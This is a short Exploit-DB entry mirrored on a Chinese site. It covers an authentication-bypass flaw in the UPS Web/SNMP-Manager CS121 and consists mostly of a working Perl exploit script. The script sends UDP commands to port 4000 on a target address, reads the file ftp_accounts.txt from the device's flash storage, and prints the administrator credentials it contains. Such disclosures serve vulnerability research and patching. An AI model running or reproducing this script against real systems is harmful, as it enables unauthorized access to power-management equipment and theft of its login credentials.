UPS Web/SNMP-Manager CS121 – Authentication Bypass - 体验盒子

作者： jkmac

日期： 2014-05-15

类别：

remote

平台：

multiple

来源：https://www.exploit-db.com/exploits/39186/

source: https://www.securityfocus.com/bid/67438/info

UPS Web/SNMP-Manager CS121 is prone to an authentication-bypass vulnerability.

Attackers can exploit this issue to bypass authentication mechanism and gain access to the HTTP(s), SNMP or Telnet port service. 

#!/usr/bin/perl -w
use IO::Socket;
use constant MAXBYTES => scalar 1024;

$socket = IO::Socket::INET->new( PeerPort=> 4000,
 PeerAddr=> $ARGV[0],
 Type=> SOCK_DGRAM,
 Proto => 'udp');

$socket->send("<VERSION>");
$socket->recv($inline, MAXBYTES);
print "UPS: $inline \n"; 

$socket->send("show syspar");
$socket->recv($inline, MAXBYTES);
print "$inline\n";

print "Searching login\n" ; 
$socket->send("start");
$socket->recv($inline, MAXBYTES);
$socket->send("cd /flash");
$socket->send("type ftp_accounts.txt"); 

while($socket->recv($inline, MAXBYTES)) { 
	 if($inline =~ /admin/ig) { print $inline; exit;}
}

sleep(1);